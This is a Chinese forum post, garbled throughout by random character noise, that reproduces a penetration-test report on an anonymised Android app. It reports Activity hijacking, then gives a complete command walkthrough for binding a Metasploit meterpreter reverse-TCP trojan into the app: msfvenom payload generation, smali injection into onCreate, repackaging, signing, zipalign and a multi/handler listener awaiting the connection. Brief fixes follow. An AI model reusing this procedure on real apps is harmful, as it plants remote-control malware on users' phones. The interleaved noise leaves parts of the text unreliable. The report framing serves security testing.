+ r9 E, m7 V. Q9 s6 z! K2 f+ o# i M* H- C3 P0 V$ Y/ n( B$ e+ D   d. v* e) O8 N9 B, P) _. l- q' x 2 s! N& Q0 U' \) w. F0 c! o

z3 M8 i Z% |% d# }8 S " X. e0 E3 c/ U" P( x

% p% Z" q |2 T 2 Z% G2 I/ x6 a# | 1-2 测试结果 " d$ w8 f7 W7 B& F6 w6 ~" ?8 _1 F% H, L. {/ ]6 ]- X. f

( H# @# @+ B7 E; r9 h 8 I$ Z* z: I3 \! N( f9 _

& Q7 x, D. c# T( v: f ! g7 D6 z( l ]5 G3 w9 N* [   ) d! Q2 j. V D9 R8 m8 p# Z# C& X# e5 S

- {* R, I! ^! ^' A" k5 ~4 G & M, R; s+ v- _0 b2 u

7 U) |9 O. S0 c( d/ Y1 ?/ P ; i! p1 b; b7 ? 2 检测结果                    6 t+ w7 e$ x9 a0 @3 `! d5 k0 \; x6 `3 I' U, _

# L3 I" M( z- y. s* O" x1 v ; Q5 a7 g1 y: J4 w& G8 K

: J5 B! ~: c/ [ R# v " b& d! a: O: d 2.1 某某某 " M/ y( v+ ^8 K9 b" I , _7 X4 B$ j3 Y1 M

6 g' t" ^) ~, N. ~/ O# `, v3 S

: M9 t# r* S0 s7 [# c$ m. F& S / l/ z. X- _% C& O 2.1.1检测目标 ( _1 R$ B8 r0 P- d# L1 I. `; U) Z9 P5 U( w3 L2 q/ g

7 J( n1 \+ ^ I2 {' n$ b+ b2 [, f( L, q( a V1 |

9 u+ T, Y- X* L, t M; @% D5 f; b2 g" T 目标地址: 某某某某某某APP ' R" ?6 U7 s' _9 m 1 k8 D; n2 y6 p5 @: l( y) x

0 M2 q8 s0 h/ p' w7 Q 5 _( ^: z5 ` ^/ A( R2 X

4 U0 c2 ?- n9 o/ n1 f , E: ?% \8 O8 h4 f 2.1.2检测结果 % h& u A( `" J; H * [. p& q! H( G) X% c$ \; v5 Y/ ?0 V

% D3 ], ^( O. M* Y 8 H; b( g$ S9 k1 F: U0 H( H

+ d# S* V# {: h. t/ e " b: Q. K3 f4 U, k" }8 S 2.1.2.1 % w, j# F1 F0 h8 X5 }$ W/ z ' R/ g* u v6 F, u! T& _+ H

# r" l; f8 `/ g$ L( n3 d5 Q% j , V% T+ A; x0 @' K0 C; B$ [1 u3 g

3 X, k' X/ K d6 h- d* T; d; d1 N- c8 c! Y- _$ A 漏洞链接地址:某某某某某某APP ; V; D \$ t/ b, ]0 j2 m1 e % P/ [2 I/ ?- }' r7 Y

; F9 X. a0 R; B6 l 7 u! G! n9 B6 Q3 r9 E0 Q$ h% U) B

% W. Z" b$ U) O2 i, H ~9 T* [* \1 |$ y) ^# o* }: e3 V% F   * B3 b/ q5 q5 R6 \: J' q) a; F 2 I7 P- _, r" m! T( j

4 W T9 K0 H2 n) [# e! D& Q l0 v% S: ]- w; m. |6 X

0 D5 f7 M! R% n3 l( {: X+ j 0 v: g4 I/ t, Y- t5 W 漏洞分析及取证: s- C0 v! D( z# X Z) M 8 l. K: q- n6 ?# e3 k) c( b

+ D& Y! V0 l( [9 H 4 B/ y, }; }6 _$ P ^; p

, F: o7 i- i- p6 O7 a3 V: I' W : B4 P; k6 v1 p+ r7 Y& h                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 0 }7 {4 |/ a2 i9 h9 P5 X9 n 8 Z& d3 W b: i2 X/ [

! y( K& T4 H: [( H# [ ) T: b; Z4 {, w

' G0 J3 i8 J$ K % h5 D" C+ q: B, B      $ S5 B8 t$ M$ Y" D. _3 [; t1 t" ]" F; O, Q

# W5 p* e8 g1 }* i! ?* ?- L: N0 r; M3 J% ]1 a5 P

0 n0 s' b# W9 J& d! M' B3 E# r! n2 w 8 p* f8 }' O1 V( u7 p3 r                       & |! ~, S8 c& W( @ / B& n, \9 D0 t& s

# J4 ?, V8 N+ G3 _. T- h. g . }4 Z# Y& I. M# q: k% t6 i% i

* y* O+ {' m4 ~2 h" | + r" Z. G, ?$ e0 j; L0 m( [+ W + P7 r6 e9 R8 U9 w4 z4 K 0 b/ K8 X q1 ]/ @- o6 U

3 v3 I( z/ d4 u0 r% o3 S3 p 9 c% f( X Q' ]# g3 F$ C% d& _4 @

: _, \. h [/ p; D) u( ^# i$ D0 o# p: H; x" z 3 z4 o5 B, V! e) P; P9 x* P1 \: E- T% O4 `+ E7 y

/ g0 R; k6 _ m4 ~+ y$ \ 0 A; _0 |* J+ X2 L3 a ]' c

2 T3 k, ~" v ^" Q , X- ]( y" C2 Y$ s3 ? : s9 y2 J" Z& i' j1 n! x y z Z. w+ e0 {0 e7 y' Q7 x" v

4 V7 j1 I$ p$ o, [$ ]+ L1 x6 t0 W0 I0 X [; q* N& Y' k3 v0 s- C

; Q. w* C: r# y$ q' ?. C; x ( ]& O1 z7 i1 K' y+ m t; R 漏洞危害:高 " ~: `8 l, t# @* \3 ]2 u* Z2 z/ [" i0 s( Q8 n

- k/ K3 J6 D* i2 W' F8 W/ t! W( A1 ^' Y: G! v3 T
; |6 X0 K: m. R" z $ ]: p2 G0 S4 q2 v: k( ^' W6 b0 C . H6 [) w! P( W+ a4 u1 q- q U: `$ q4 E) a% k( @7 Q5 c8 ~5 H# w% |* f& p& Y% Y% |$ I# Q) t+ q3 a+ V9 i4 q3 Z; J: P- e G A4 A( }+ U; ^2 A' C5 Z9 t" S/ ` v7 [0 k5 b# b1 F! I& x4 o( Z; Y* T } e* y! H z8 @8 ^3 ]7 ~3 W* ^4 G4 P- }* v. D0 a, U3 `. g; l2 I5 q6 _+ T3 [* h4 N# }. w2 }3 }: N3 W% {% ~$ `) x% h6 C( [/ m" X2 j1 z' Y' _7 H; R& ]* b7 P, ^* R" F9 i' ~! s' L4 }! O1 h q5 W d' h3 V6 z" _4 |7 i/ O8 z) o) A6 s, `' X# T6 u/ s( ?8 v; _9 I f0 F0 N3 U3 i- b$ k1 ~( f8 s' W* s; ^6 N# |& D" R# o3 ]8 K D( J* J9 m8 E3 n) }" O; h0 s( N8 [& M/ `3 T# P! X8 R ]* s" h9 F6 A& O- U9 S K8 W- f; N
?1 \4 Q2 S, z' x! Q Z$ V2 t7 k! Q 1 x5 G) B% O( V

5 L" x3 g0 e0 W; m$ e% K' ]5 W1 F & Y8 u7 h6 W; v7 C. c 严重程度 3 O6 X s5 h5 \* ` / I, h$ l8 _) I7 N

( Z( X) m3 Z+ S7 U8 t3 f/ } : t P& \) Z* t# ?; ` 		9 _8 k2 L. b* E 9 G! E) F% w4 v7 s9 q. e

" x& l" d' c6 n3 X$ f 7 @3 S" v# b! j) b# B: ^ - c- L: C9 x& X% Z: s6 K 7 }: o* h/ T9 B3 \8 v

; \* R& j! }; `5 D% W F0 h9 \9 l d! K 		0 ]- O* C" S; b2 u. {+ T6 Y$ V% w* ]

- N2 q8 g+ |, `1 R) f/ C 0 Y9 r+ ?* c+ U- B; Q- f+ [ 9 N" {9 w7 E f3 w# L U. S/ _& _. S" i. x1 S! i) P

- y: V/ _9 O# z7 v1 ? 0 g; s8 t- h2 z 		0 r' I# _( V) q% G 3 Z+ L# R& {9 } P! {: m: v1 u4 g `

6 a* m0 J0 r' z# ~0 x 1 P$ X: K$ Q7 G, ?9 J . ~& L% s+ F$ ~; x( P% d3 W2 w7 m, N8 L2 k/ n c% G

- _) L N, a9 C- ]( v7 y ) M3 F2 A: g# n( A" x9 w+ ^ 		9 n' | E+ y# n4 } 7 X4 s5 S) |, S4 u

+ x9 u# G8 w- V; f5 [ b; G9 C # q! ~& [$ ?+ b x3 [3 b   4 {: G/ t5 c0 V1 B- Y4 w8 |& ]7 G& n+ p" Y* v7 M# L

, q F0 x* C( U$ e6 y1 |; ?$ e5 ] 0 W# S" L; `- F3 z/ V' ] 		, [& I5 @& H" d! E % S/ r# N' i0 C q

- _1 ]4 ~$ l# q$ l) Y! P/ o$ Q# y G " O" b5 q4 h I5 G " b) k" T1 J8 u/ A5 t- U

9 W5 B5 `! ]; v, C; i: b' V ?7 ], V% I4 g; s. }0 s; M 		- K' a/ ^5 t& H, W2 A. e; e$ |! t! }; E' U3 L

: Z+ l3 E" _! w7 o1 `4 m7 @ ' d- t, k. Z% x' c2 r   ! X* x* N7 p4 Y 2 l) e1 ?/ p! w4 ~5 ]. t+ s) _: h

! k" M0 w: V$ S$ T/ e ( i9 R' z; X! y- Y; |- e: r
/ k& X6 y \# S1 Y: J H/ t( |) h* l' C
j; o( ^; X7 T2 N' \3 \4 {! |5 D' o

0 g$ R( W; |7 L6 W' i D2 k ) O# ~, Q6 J- J   . o* q4 C! W+ S1 O; e2 u % d) }0 h4 z2 i( j) g: D

/ M1 j0 X+ i8 s# C/ m7 s* X8 w) Z" c P1 S2 R2 f9 ?

& o2 X+ G/ L: N 0 l1 j! G' @: _3 ]+ N5 ]1 U 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 * t: X4 p# U1 O: K) `+ a+ e8 U# C# c% A4 Y& N6 y& L8 N" P$ G

M0 |2 I+ Z, [. h* X, U! t4 ~" d 3 z, v8 w1 w# M$ ]" B" \# }6 `

- [. K8 x, ]; T $ K' h/ Z9 O- W% h           3 B( ^2 _3 \9 J( P" G' y& j. H 4 f* l% @% w' E) l7 J( W, V f

! ^3 o& G# ?$ u& U6 A ' p; |! g' p" V0 r

: f, J% M+ \' i# T / P, c3 j0 }# q; _& b/ l   2 Z* p, y; Q: U" x F6 l( W 8 l2 D e5 {( x$ [% p( H7 Y

/ N7 | x( [- g7 e. }" W! w 6 d7 w4 C. h% q$ M, o" N" D

% K# n/ U) H' M0 C6 E4 A , A) p( |0 J8 E0 `9 _- ^ 2.1.2.2 ' ~& y: e' x6 S6 Q% V2 f8 U% J# V) ?8 l6 X/ ?- } x

5 @/ f3 e* s4 g3 ?% s- i+ t8 S! L2 \ % y9 Z" K. X5 Z+ P# {5 y

& v6 O% Y( G# W" t& s7 ]* f1 D: M0 m3 |3 Y2 R 漏洞链接地址:某某某某某某APP ; V* z/ V9 b$ v* x& P1 [ * n( Z H; X3 |

! }' e3 W% ~! J$ K. i % B9 j: ^0 F1 L4 ?* R$ ?- v3 q1 J) E

- p4 ?* A; e- K$ a8 g$ o0 P " j( I0 F$ j/ t% i# Z 漏洞分析及取证: 1 K. ~5 l0 \+ ?* k; m" u2 ^4 [9 s8 `/ L8 ^+ l T; O H5 @

3 Z6 ?0 }/ D; S& n, w ) W+ V5 s* y" C' ]6 U

* [; A3 q7 G j: L7 R4 }7 `6 J7 _ u; A% N% s( Z2 I6 T1 N7 v                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: " J. Q; J- `2 G3 v B $ X, {5 ~5 e8 N

$ t8 [ \8 z! ~7 R# ]3 p6 L/ m$ C4 _0 {' y

. C2 S, ^" N' c. O# Z 2 v" b3 H& K/ o) s Metasploit 生成木马 apk : Z1 `4 W% w! Z: Q2 D" j/ e8 v1 r$ X. p7 p Y" k* V4 u

7 e" Z# r, R+ s) I1 \ I5 j7 P; c2 a; e

2 M0 U- W# p7 H% }" E% t k: P( G! ~* z7 z# {& d& i msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk # X: r1 ?; a9 \. B " a' s4 r0 A6 W) v2 z

6 M2 R! G% }5 r; {8 v+ } * [1 \8 Q4 G6 K7 k; G N

0 @ r1 ?! A+ l5 M0 q # B& L: X J' c 反编译目标apk和木马apk & ~8 U% H ^) _8 C/ H 7 z/ N7 h! I4 e6 x* L

& T" r% I% c4 ^) `: m' S 1 p" y' D% U* [4 |$ R( F& A

0 j8 h5 x2 Z1 |9 D1 m' T3 N1 y5 J * ^1 ^3 Z, j3 m1 _ apktool d target.apk
. f0 o3 I/ V) g7 l; B4 s% u * m2 c# J$ b s; o apktool d cockhorse.apk ! t# Q/ f# k" R4 }8 w0 n9 C; j+ S $ d" T+ H( B* t6 w7 e

, r9 T" m: }- d; C) G6 r5 e/ h ! b1 P1 ?: W5 y$ h* B/ q

( v9 j+ C* {" ~8 q& c H5 w! q! F: \ { 木马 apk 注入目标 apk 4 ]& M+ Z/ E) _0 x & j. u2 X% s( g, o

! r' v8 C7 h# r" O , o) r: w! {# O7 j- r

% f% ]: c* G: a" s( y7 } ( o n$ R9 W( i* W0 ~7 h 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
& f/ a- Z c% }3 ], M 3 G# }( p" r1 @8 R% h invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 1 P3 ~8 G' E% `: _; m- }' X: }- _1 k4 h! k' D

4 C9 v: ~5 r" e6 L4 D % A( S( p# H& Y( L! J* L" U( U

1 f4 v3 g! Y9 b0 K 0 U/ q0 G t' ^: m 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 % i6 `* G$ N+ [0 T! q4 m 5 G3 t F8 W J

+ C9 e/ i* l: [8 W2 O5 e2 j7 q+ U9 F8 I+ {; c

, S# F; p* \ Y* A# q7 D# x p! \2 n; w7 z/ k- l7 p% u 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ # r; e& B$ h( [ 0 e: ^" e: @& P+ ~1 S: I

* j& e: V+ a# C N+ P" W 5 ?2 I. y* K9 U

4 G% c- A" E7 b F, I: V# Y' @, I/ U) V- m* |5 `% Z: M+ O$ \ 回编译生成最终 apk ( m9 d E0 u6 F r! o7 e2 O" \3 V9 f% K% T2 a% j

1 R- K8 j) O+ u1 V2 ^9 @. b- Q; U0 t, m1 ?6 d

* a% }' n' d9 T2 S. O/ j' k 9 ~! q5 q( i% C' ]; h! N: L1 H" `" z 重新打包 t' g& X: L2 q! X/ o4 B7 I * r$ N4 ^9 v4 T

' o4 G: O9 k; k2 [+ z: o ) P5 P$ w' C4 d* s- |

& `/ I! q* h3 I/ v% ]8 _3 K1 {% K7 c) H apktool b -o repackage.apk target_app_floder ' F6 y8 a R9 q V. Q. s; g' s) g& u# _

8 s4 B! X8 X6 U: S6 h6 ]* y. S6 F$ h4 `

$ v) B$ T9 N7 R- ]) f. d( o- ^# Z& x3 s6 m& l: V 创建签名文件,有的话可忽略此步骤 ( E, y8 T# T9 }" }8 h0 p( Z9 Z! z/ C" c

n. \8 r, v3 }% m: {, P 0 B/ y2 Y+ E- ^0 u% V5 ^: P% b5 G

( ]) E/ r5 x; w I) G3 d 6 p" B1 q. h8 c# ^ keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                7 d' t- P" p) @ c7 ~! L D# Y& U* g# a+ T

/ U# F/ w/ ^/ I- A' z& j" t" R5 X+ r6 P' S. k- l- r+ C) M9 f' T3 L& c) j

5 {2 P- G/ _, t$ @% K0 R1 j6 L" C& s8 X, W- N 签名,以下任选其一 # q q' C( b7 m0 H v- ? . s& ?: Q2 m+ _% Q4 Z* q

8 u1 i: u/ F1 E/ o' [ % W+ x9 G1 N) Q' s1 P

: l8 p, i u% a/ z/ k$ D " y P, U D' l# W! U' o3 \+ z# B jarsigner 方式 8 t, {2 F1 P7 q ) j1 r& ]2 m0 ^0 a! n- H

8 t1 q, H& W; C8 v( n4 F& z) H6 I: A" g* r0 s; K

2 K: ?" {5 N% E" T% C+ N. ?& i. ]/ L/ e# ?' G jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ?, t% U. u' |, Y i, x , B4 L1 T; r9 F: f

' H0 q# L8 b0 _7 r p 7 n! K( h7 O6 p) R% e* u0 l

) R4 s9 }- X9 d/ `: S$ H 5 [7 Q0 x( v, u- o; i apksigner 方式 9 m% @0 L7 J; W* h: o ' p; Q) k. W9 _6 V

" D( V( C W3 S, M9 R9 _ : I- }: x# O( h

0 |. [9 I9 Q) H! ?3 e3 v# @! A ) V0 ]( {$ D1 c# v |! q0 A" { apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk - s9 |- H' N3 j4 n' U5 e8 K% \+ Y. W; A, c2 y" e

- j3 z( R+ [6 U" o' I: B# m4 o8 y" j# Y9 ~9 u* o% `( w

9 N* h7 i. L/ k& \ & T2 w( ^3 k. l1 h* \" Q+ n7 y 如需要禁用 v2签名 添加选项--v2-signing-enabled false % S) x$ X' T3 U' z- }+ Z1 a2 \& @. A# w, b: [7 E1 N5 A

6 b% W) e( j7 u2 I & o N" Z) |; S2 o! c

2 ? F5 y1 o# O$ c2 G0 ~& [ % Y/ P6 [0 G5 v- x9 N 验证,以下任选其一 & q: u: \% f, Z& u7 @2 V$ E 4 J9 l6 e8 W/ p$ a9 Z

. l! Y5 y |/ F 0 Y( R0 U# ]- f$ x8 S/ |

* b/ I0 I- h9 q# p6 f# E ) p: u- b. w ?* W/ e jarsigner方式 5 J+ s9 R, d8 {) |) a+ m( B9 \ - Q7 \2 E+ L% Q6 H |

. _7 S( C v$ s) N & c! i6 `5 u% a/ U9 X9 R% {

# }/ n! U$ j3 P" }. o% U 9 m( ]# d9 s& A6 G* e- F3 H: | jarsigner -verify repackaged.apk 9 c8 w- Q" S3 v + |, X7 A( s6 N. C, i- D

# A2 T( G# T9 E4 |+ N6 u: ~. ]# d5 r4 A/ x' b& C- q" B

2 U! m1 C1 a, k9 j7 [8 f f$ u ! ^; D: K" U. j4 y$ L" O apksigner 方式 2 W: i l$ R' x6 L$ ~8 g& f( e8 N: O* e& E8 r

' i8 L5 @* Y8 c3 e - N7 n6 ?; c7 N: g, g& E

1 b- {/ W! a; F, a+ o& W5 o ' W% X. |+ E6 K apksigner verify -v --print-certs repackaged.apk , q/ r1 P; C! r6 R1 ~ ) ^9 H3 }. D2 f; x' Z& Q

: {6 M8 Z% m- F) d ! ? }6 G: A, R. h. Y! \/ L

. D% e) a6 F$ H- b! R3 Z1 u+ C5 ?3 z' f* w2 c; i m keytool方式 6 e3 u- \# Q0 R: N+ L! i2 h6 A( w. [: ^& `4 c' K

* i; y( M% U% o+ S 6 v: P j! d# E' p" |. a

; Y, z( U5 ?% j( n 8 A' s( P( b" Q7 z3 p; `9 {$ r) Y: S keytool -printcert -jarfile repackaged.apk ' d; a; y2 p1 x# ^' U " s& G6 |8 r: @

8 O3 x% R P2 J2 m5 D 7 [. @; c2 {. P) q; v% S! O

0 j ~5 C4 R9 `- S; T8 X 6 Z! u' }7 H& e- E+ ~ 对齐 ; S" P( h' A( n, J 1 `, e% }4 t1 p& X9 B4 N

; L9 J, E( U7 {' n# h& o' d3 j0 [+ A; c 2 i: Y0 N- f; ^0 v' U8 w

( I, E" k/ q# ~' }, H ( O! ~/ J% `9 Y7 ?- \# ]0 I0 l 字节对齐优化 9 S, d p/ r1 Q1 p" r0 }& c5 z3 E, `* o Y

0 h! Q! I/ Z2 J( c' ]" B. h) m: Z$ J) c6 k4 C) d1 o

8 x# n' z3 v n8 y5 g0 R; F5 u + X {( W: }/ r. I; B; u" b zipalign -v 4 repackaged.apk final.apk 7 _0 s* _" { u" c3 |6 t2 ?; Z, d 4 Y* A4 r6 [5 _. z ]& O

) o7 Q; [5 \' X. z) ]4 G : I; C2 u2 ?, v& y

2 f9 X" |, Q, s% |' s9 r . D) y$ Y5 i$ Z 检查是否对齐 4 d& A2 n+ s* I ; k0 i- v0 g* [

; W( R9 c6 ?4 s" R2 i6 ^9 v/ u# s

4 M5 z6 ^5 ]3 }; }: z/ e1 f9 l; H7 [3 V! H a1 H7 D zipalign -c -v 4 final.apk - A* T6 l% [6 d5 r0 ?& P; | " ~% [9 } s5 g( ~, Q% f

) \, H9 Q$ l9 G- X8 ^& S - l, O& ]* ~' h f0 @$ j

9 Q) v9 [ ]. `' X, E 2 q8 a2 H3 ?, H' N: ~% f, c) Z, b 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 # W% l, O0 c( k/ w4 u/ L& T * u- B9 F9 ?; t9 ~9 E

* i! F$ U I- z: b) \ e 2 ?- m: G" x4 ]4 e7 b% _

8 N7 l n$ J! w" {" L " Q1 G+ a8 N7 {5 X4 j6 B+ R 启动Metasploit控制台,配置参数等待上线 9 W. z; W2 U L, M L9 |: N) L. Y% S

* [8 \" \ D! e& o / s4 s6 J2 q" P

7 w1 N- t u k- {3 b. M& U2 |: O$ A * n+ |. ^2 ^$ {# B) I, |% x 在终端依次输入如下命令 7 A3 H9 ^8 z. F: Z" A9 P$ g8 Q7 l- W. a( ^$ X& A& B6 t" r

% h/ S- E" g, _ : y5 G" L' H3 i0 [, J- w( P, Y; W

; b, N- T S3 }- |9 N+ B/ w/ Q y5 [# l3 h7 V) z" A0 m msfconsole 4 r' j* J6 Q% _# k/ G* o6 ~% P& s4 G. S

: O# x) ^1 d }+ B; `; f* i8 m2 C9 z/ p

& J) `+ |1 k) f9 ] - J% B9 w& f7 T. v( }' G use exploit/multi/handler 9 a! A9 N; F% E* z( A2 V9 m& L 5 V: b( y; U+ i2 T/ y+ M. ^

/ O0 s% F( S+ L6 Z6 D* V , L, W# q# g# l# z

0 V$ M/ C2 h8 o% `& \/ ^' F8 r7 l4 S9 @/ S- a2 e set PAYLOAD android/meterpreter/reverse_tcp % A+ ]) m+ V* a& R1 R , o, e- Q" h9 z0 K9 h% n

7 d( \, l% A- d: V' Y9 M9 i " `, W: u+ e _+ R7 z4 {

6 ?0 g2 w# ]& H! r" J) n5 M y" `# w _ A set LHOST 192.xxx.xx.xx : \5 }) s% X) F; U$ z # B4 q" M, H: e% n* {

$ f3 c, G4 b" r, f, a5 c * f( e N& K' F5 @8 p0 W4 _9 ~

% n4 k' [# k3 J r% R Z, e * U: B- I( S& \) z" d; F1 P set LPORT 4444 . E S6 M" g$ N# U. Z R" l, t& ? 4 I A$ Q' g0 V+ v/ _' Q' N

+ _. y0 l$ q& @8 G1 G : `' N! @4 V) A4 r6 t" B- \

0 h. Y) `2 Y, p% g$ s6 n& N" u) s, g exploit 8 c/ I( z' m7 C. J' [! d $ U N7 ]% L( _& v3 A. R! L

. b# H p5 S' d1 \$ d7 T) k 5 a: O6 b/ X z4 G0 M% o( `' | y6 n

9 i" E, S$ G' C4 t# c: M! g8 N) L4 D 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               7 b& L0 C% G3 t3 U0 o2 J1 B2 Q ! o& S. s- V, k" b" F8 N$ F

/ Q% _' e) h q+ O5 ~' f % T& A4 E# X4 C% f. j8 C

+ ?, z+ m) J8 _5 Q& x ; v* t8 x( p- |+ P* |2 d 漏洞危害:中 4 A* ~- e/ E4 _% W) s j9 g; K" x - A0 v( S+ Y# |- s

0 z- `# @0 w ?: W# J3 h . R0 n3 _4 O0 N+ s0 k) I
: D7 J+ h0 f7 ` % [2 k. D# V6 u0 ~ ( A9 U$ T1 ~9 A4 |- H, e- L2 p1 _& g5 v( ^ 7 B |4 Y- I$ m `1 B4 y; D ! Y" S- d% Z# y, U) {: x- P" o0 o1 c& n+ A+ m t2 m _* C1 S* ~) T5 R: [! [9 \* M' O( J& L* V7 \2 Q+ N- _0 [$ @9 Y' a# | f9 O A" |" q4 V7 R) v5 I7 Q( \$ B8 f( R0 I# W% U$ r' z& S1 l% M- R3 G/ N/ R' j$ Z% S7 L3 I% B8 U) L; f' j& n% D- L6 F8 m8 k' z9 Q& z6 S# |4 i1 J" J2 J8 I. C7 Q# D9 n8 q# m1 C4 y) R, }0 t( y' q, l2 \# J/ ~% s& c" A: d+ R* H6 g+ v, V9 `* ~ v3 H; \( M V9 R, f- w1 Z ~3 s. r) V+ v5 B: ~+ m1 w( y0 q1 C9 L+ j1 e! ~4 N2 j; B* F% w) }/ l1 P9 t# V p+ X, K8 ]9 o9 e7 @* b: Q, Y& b/ ~; X2 j$ H6 o U) X( Z) i8 X8 u- Y" [+ t: |- r" g3 _4 I# V; L* w$ L" U) d2 v$ c: A7 Y
. _0 {% ]/ t. @! y$ E! Y$ d$ f/ q4 ^ , u1 d1 q7 g; m5 g+ Y& M

3 w5 B# a0 ?1 r% a, V6 | 9 ]8 X% @( Z4 |2 G6 Y( i* J 严重程度 ( K. e R& q/ c# K5 T7 m& i# q- \" o. a& H) o: l

) S0 E( `" p+ ]: o) G5 \* ~ / D) g" c- R6 U! S 		% }4 p8 D3 D J+ v' Q8 |$ X; F- d* d& _4 \4 e1 B

% h4 o! K* b* |/ b8 P' O$ F! b" |- [8 T& L. O. f+ @$ m3 M 0 E4 y' J( N! o7 ~( l * E: m( V+ J$ |; E, I

/ k1 j8 K# F, f1 S) _ 5 x% ]3 f3 P+ ]) K5 m9 N# @ 		& A9 Q& W, d* r2 h; h v1 {- U5 H- s. z* w x" O$ R

' b) N' Y1 N0 A% B$ l6 J$ [; h6 Y( Z; O7 ^% R0 r8 Y+ q" Q$ z9 I 0 w' f2 ]0 [- {. s" D p ' f. j! t- }- h( D/ i o5 Q( ~

$ g7 i* \: i- P $ I1 j* v: \, O7 L6 p8 B$ h9 r3 M/ O: W 		0 x- u/ r/ D2 P3 L1 D9 s _( t# n% _3 }8 q

9 R: F6 H+ f' c; j5 N8 E6 T1 O Z # F) G- V r) {; e& t6 \8 Y! ]. m 8 T4 g1 O+ v& M/ y' } 8 I& `- E* [9 Y: A) H

: S& f& l3 t" T $ k2 i) G% e. U1 H4 p) V, A+ y5 b7 n 		8 k- q) Q; N3 V( {' ]( d9 m ~9 }* j$ C/ s6 I* ^' y) ~, A ' i2 O+ K- q$ e9 L/ t 2 c7 W2 w9 B. C4 H/ v0 r$ R

5 G+ ?$ g$ b3 e P% Z) W! o 5 q/ v( ]. ^, A" U/ h0 U% z; X& }   - M J7 s8 e. I, V2 o( h8 T. o4 ] * ?6 ]- w: h9 b7 z

4 ?7 ?1 X5 ^0 a" ]3 h) u : i1 H/ R6 O* `( G2 N: O( y5 K 		x9 X! o5 S' H; y; a7 P ! ?) b' }0 F R. ^% ~; R z8 `& A

1 Y" O8 i+ v" c3 g 3 F; p1 m; c/ a4 l 9 B( G/ s7 U" S9 ]6 R " E: ]3 f5 e7 }# v2 }- ~; G

B* }4 J! z& I/ F- W " z! W% x( Q4 Y: K8 H 		8 r/ ^% ^9 F# J( y. I- ` u 1 Q& x; @0 h; ]3 v ) \: a( T$ h& `9 T 1 w& h. C- {, h# h+ k

% ~% p: }( T1 K' M0 F: ^2 T ( ?/ p/ I X+ r7 ^1 h$ I   4 L. k9 ~ K x9 D7 U- s1 ?$ f* u0 `' `. u; u" u0 o2 _7 l

* q0 @: S* \2 m- O# P4 C" I) E 6 x# d: ]' K# c+ y
' k/ b4 v7 |# p! I9 ~, L/ X' l! F* X : j+ ~$ _5 I9 n
+ Y" e. z6 q7 t5 D, ` ( F; p4 O: V# |+ W% B" o* B

! m+ F D" T# M" a4 ?$ |4 x2 G& i Y7 c" @   ) x* w7 ^8 Q/ f3 N# F& r1 c 5 y2 i, t# }8 z( r' c" X7 b

8 g$ P- ^ N2 a4 s- E% w* r ( _% \' I2 Y$ D4 ?

* N. z' ]% w# f k7 k! }; e N% V9 U5 L# E( D0 e 修复方法: : [ s+ j+ n: I1 o 4 U" C1 |# E: N

+ i+ [; [ b) p" k) D2 _8 d # C6 h5 P6 r, @5 d& @

- X! c. \6 V( ^! p ( M# l3 e4 B9 X; ~0 A               1. APP 启动时应做签名校验防止二次打包。
) R; e0 Z% U/ ^: {3 H- k " _3 B( Q0 P8 Y& u. e% m 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ) _! e7 \, W; O ?; {$ ]8 y& J5 e7 j5 {- q6 n4 ]

& o) U. c# c- i& |% ?& m7 _; y4 l* g# {/ V% V/ _7 x 9 ?$ K3 I! U# l; O, a# G! {( g( E4 w. O) r/ r' H0 S

( T! ?* _7 D/ P( o r& O " o, @; ]6 b& u& n" Q   0 I0 k9 `( Z( `; | ? 8 L( n+ y/ R. J7 H w' P6 S0 U

( b V! T2 {3 e* I& \ : B- ]. z0 h: B; u# n0 E & `9 l+ O0 N2 } H 3 s, e3 i9 i4 V* ]' p8 e

" o5 {- j3 Y/ S ; T! Y% p4 g% h
4 F/ c3 [: t" {( D. A( u7 F & q8 K1 ^5 W2 u: V$ }- d" Z: N

7 D& D/ P v! |, H& g) T0 K) Z6 A3 ], {- H1 V3 o3 e! S3 x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表